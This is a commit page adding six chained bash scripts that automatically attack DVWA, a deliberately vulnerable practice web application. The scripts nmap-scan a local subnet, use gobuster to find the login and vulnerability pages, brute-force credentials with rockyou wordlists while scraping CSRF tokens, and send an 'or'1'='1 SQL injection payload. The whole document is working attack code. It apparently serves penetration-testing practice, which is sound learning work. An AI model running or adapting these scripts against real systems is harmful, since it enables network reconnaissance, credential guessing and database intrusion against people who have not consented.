Permalink
Show file tree
Hide file tree
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
6 changed files
with
262 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
#vulnId.sh --> bruteForce.sh | ||
|
||
echo -e "\n---- Starting Brute Force on brute vulnerability ----" | ||
sleep 3s | ||
|
||
## Variables | ||
LOGIN_URL=$LOGIN_URL | ||
BRUTE_DIR=$BRUTE_DIR | ||
#USER and PASS found from bruteLogin.sh | ||
DVWA_USER=$DVWA_USER | ||
DVWA_PASS=$DVWA_PASS | ||
|
||
#DVWA_USER='admin' | ||
#DVWA_PASS='password' | ||
|
||
USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" | ||
PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt" | ||
|
||
## Value to look for in response in webpage source code | ||
SUCCESS="Welcome to the password protected area $DVWA_USER" | ||
|
||
## Anti CSRF token | ||
CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )" | ||
sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie | ||
|
||
## Login to DVWA using cookie | ||
curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null | ||
[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1 | ||
|
||
## Counter | ||
i=0 | ||
|
||
## Password loop | ||
while read -r _PASS; do | ||
|
||
## Username loop | ||
while read -r _USER; do | ||
|
||
## Increase counter | ||
((i=i+1)) | ||
|
||
## Display USER:PASS attempts to user | ||
#echo "Try ${i}: ${_USER} : ${_PASS}" | ||
|
||
## Connect to web server | ||
REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )" | ||
[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' | ||
|
||
## Check response against SUCCESS string | ||
echo "${REQUEST}" | grep -q "${SUCCESS}" | ||
if [[ "$?" -eq 0 ]]; then | ||
## Success! | ||
echo -e "\nFound at Try: ${i}" | ||
echo "Username: ${_USER}" | ||
echo "Password: ${_PASS}" | ||
|
||
#echo "${REQUEST}" | ||
echo "$SUCCESS" | ||
sleep 3s | ||
break 2 | ||
fi | ||
|
||
done < ${USER_LIST} | ||
done < ${PASS_LIST} | ||
|
||
## Clean up | ||
#rm -f /tmp/dvwa.cookie | ||
|
||
export COUNT=2 | ||
|
||
/bin/bash ~/Documents/DVWA/scripts/vulnId.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
#scanInit.sh --> bruteLogin.sh | ||
|
||
echo -e " \n---- Starting Brute force on Login Page ---- " | ||
|
||
## Variables | ||
export LOGIN_URL=$LOGIN_URL | ||
USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" | ||
PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt" | ||
export IP=$INIT_IP | ||
|
||
## Value to look for in response | ||
SUCCESS="Location: index.php" | ||
|
||
## Counter | ||
i=0 | ||
|
||
## Password loop | ||
while read -r _PASS; do | ||
|
||
## Username loop | ||
while read -r _USER; do | ||
|
||
## Increase counter | ||
((i=i+1)) | ||
|
||
## Display USER:PASS attempts to user | ||
## Comment out for less noise | ||
#echo "Try ${i}: ${_USER} : ${_PASS}" | ||
|
||
## Connect to web server | ||
CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' ) | ||
|
||
REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )" | ||
[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' | ||
|
||
## Check response against SUCCESS string | ||
echo "${REQUEST}" | grep -q "${SUCCESS}" | ||
if [[ "$?" -eq 0 ]]; then | ||
## Success! | ||
echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}" | ||
sleep 3s | ||
|
||
#export credential variables to use in next script | ||
export USER="$(echo "${_USER}")" | ||
export PASS="$(echo "${_PASS}")" | ||
|
||
break 2 | ||
fi | ||
|
||
done < ${USER_LIST} | ||
done < ${PASS_LIST} | ||
|
||
## Clean up | ||
rm -f ~/Documents/DVWA/scripts/dvwa.cookie | ||
|
||
#Create counter for next script | ||
export COUNT=1 | ||
|
||
#Call next script | ||
/bin/bash ~/Documents/DVWA/scripts/vulnId.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
##init.sh | ||
|
||
##Force no internet | ||
#nmcli networking off | ||
|
||
##Check for internet connection | ||
wget -q --spider http://google.com | ||
if [ $? -eq 0 ]; then | ||
echo "Online" | ||
echo -e "---- Starting Network scans ---- \n " | ||
/bin/bash ~/Documents/DVWA/scripts/scanInit.sh | ||
else | ||
echo "No network connection" | ||
echo "quitting" | ||
exit | ||
fi | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
#init.sh --> scanInit.sh | ||
|
||
##Variables | ||
##export local IP | ||
#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | ||
|
||
#Get all IP's and HTTP ports on network | ||
nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt | ||
|
||
#Get HTTP ip address | ||
export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}') | ||
#Get HTTP port | ||
HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g') | ||
|
||
#rm tmp.txt | ||
|
||
#HTTP_PORT=80 | ||
|
||
echo "IP address: $INIT_IP" | ||
echo "HTTP port number: $HTTP_PORT" | ||
export WORD_LIST="/usr/share/dirb/wordlists/common.txt" | ||
|
||
#Create variable for the Login URL using the IP and open port number | ||
export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*') | ||
|
||
echo "Full Login URL: $LOGIN_URL" | ||
|
||
sleep 3s | ||
|
||
#Call next script (Brute Forcing the login page) | ||
/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
#vulnId.sh --> sqli.sh | ||
|
||
#Variables | ||
#URL=$URL | ||
IP=$IP | ||
SQLI_DIR=$SQLI_DIR'/' | ||
SQLI_1=' or '1'='1 | ||
EXT='?id=1&Submit=Submit' | ||
LOGIN_URL="http://192.168.40.145/DVWA/login.php/" | ||
DVWA_USER=$USER | ||
DVWA_PASS=$PASS | ||
|
||
#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie | ||
|
||
## Anti CSRF token | ||
CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )" | ||
sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie | ||
|
||
## Login to DVWA using cookie | ||
curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null | ||
[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1 | ||
|
||
## Connect to server using cookie | ||
REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )" | ||
[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' | ||
|
||
#Display Success | ||
echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//' | ||
|
||
#Attempt SQLi with DVWA'or'1'='1 | ||
echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n" | ||
TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )" | ||
[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' | ||
|
||
#Format output | ||
echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/<br /\\\n/g' -e 's/pre><pre>/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's/<//g' | ||
|
||
export COUNT=3 | ||
|
||
/bin/bash ~/Documents/DVWA/scripts/vulnId.sh | ||
|
||
#Clean up | ||
#rm -r /root/.sqlmap/output/$IP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
#bruteLogin.sh --> vulnId.sh | ||
#bruteForce.sh --> vulnId.sh | ||
|
||
##Variables | ||
#export URL="http://192.168.40.145/DVWA/vulnerabilities" | ||
WORD_LIST="/usr/share/dirb/wordlists/common.txt" | ||
EXT="/DVWA/vulnerabilities" | ||
COUNT=$COUNT | ||
#export COUNT=$COUNT | ||
export DVWA_USER=$USER | ||
export DVWA_PASS=$PASS | ||
export LOGIN_URL=$LOGIN_URL | ||
export IP=$IP | ||
|
||
case $COUNT in | ||
1) | ||
#dirb on DVWA home page to find brute vulnerability directory | ||
echo -e "\n---- Finding brute force directory ----\n" | ||
export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*') | ||
echo -e "Directory with brute vulnerability: $BRUTE_DIR" | ||
sleep 5s | ||
/bin/bash ~/Documents/DVWA/scripts/bruteForce.sh | ||
;; | ||
2) | ||
#find sqli vulnerability directory | ||
echo -e "\n---- Finding SQL injection directory ----\n" | ||
export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*') | ||
echo -e "Directory with sqli vulnerability: $SQLI_DIR \n" | ||
sleep 5s | ||
/bin/bash ~/Documents/DVWA/scripts/sqli.sh | ||
;; | ||
3) | ||
rm tmp.txt | ||
rm dvwa.cookie | ||
;; | ||
*) | ||
esac |